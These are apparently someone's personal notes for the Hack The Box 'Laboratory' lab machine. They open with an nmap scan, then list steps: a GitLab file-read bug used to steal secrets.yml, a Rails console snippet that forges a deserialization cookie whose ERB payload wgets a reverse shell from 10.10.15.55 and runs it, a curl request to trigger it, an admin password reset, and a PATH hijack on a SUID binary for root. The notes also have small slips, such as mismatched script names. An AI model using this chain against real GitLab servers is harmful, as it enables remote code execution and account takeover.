Notes

 

Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-15 01:48 MST
Nmap scan report for 10.10.10.216
Host is up (0.056s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
| 256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
|_ 256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after: 2024-03-03T10:39:28
| tls-alpn:
|_ http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 254.92 seconds

 

Using this vuln: https://hackerone.com/reports/827052

Found: https://vimeo.com/422686763

I am using LFI to steal the key (basically a seed) and then load a local instance with that key. Doing so is like having an exact copy of the program which means they generate the same cookies. Using those cookies, I can run shell commands as git

1. Create account on Gitlab

2. Create 2 projects

3. Create an issue using the LFI vuln to get /var/opt/gitlab/gitlab-rails/etc/secrets.yml

4. Create your own Gitlab 12.8.1 instance

5. On your own system update /etc/gitlab/gitlab-secrets.json with the secret

6. Execute the commands to get the git user on HTB to execute commands. In this case download a reverse shell and then execute it

request = ActionDispatch::Request.new(Rails.application.env_config)

request.env["action_dispatch.cookies_serializer"] = :marshal

cookies = request.cookie_jar

erb = ERB.new("<%= ` [command here] ` %>")

erb = ERB.new("<%= ` wget --timeout 5 --tries 2- http://10.10.15.55:8000/reverse.sh; bash reverseshell.sh` %>")

depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)

cookies.signed[:cookie] = depr

puts cookies[:cookie]

7. Send curl requests with the cookie to get the user to execute the command

curl -k 'https://git.laboratory.htb' -b "remember_user_token={output from cookie]"

8. Start rails console and update user1 password. Use creds to sign into gitlab

u = User.where(id:1).first
u.password='password'
u.save

9. Find dexter's private key in securedocker

10.Sign in a dexter, get user.txt flag

11. Use a tool like lsh.sh or use "find" to find programs with SUID. There is one program that "docker (UID 998)" is using.

12. Read the method names by using strings

13. Make a malicious chmod program with reverse shell

14. Add the directory with malicous program to PATH PATH={dir here}:$PATH

15. Run docker-security program. Get root shell

16. Own Root

 

 

/usr/local/bin/docker-security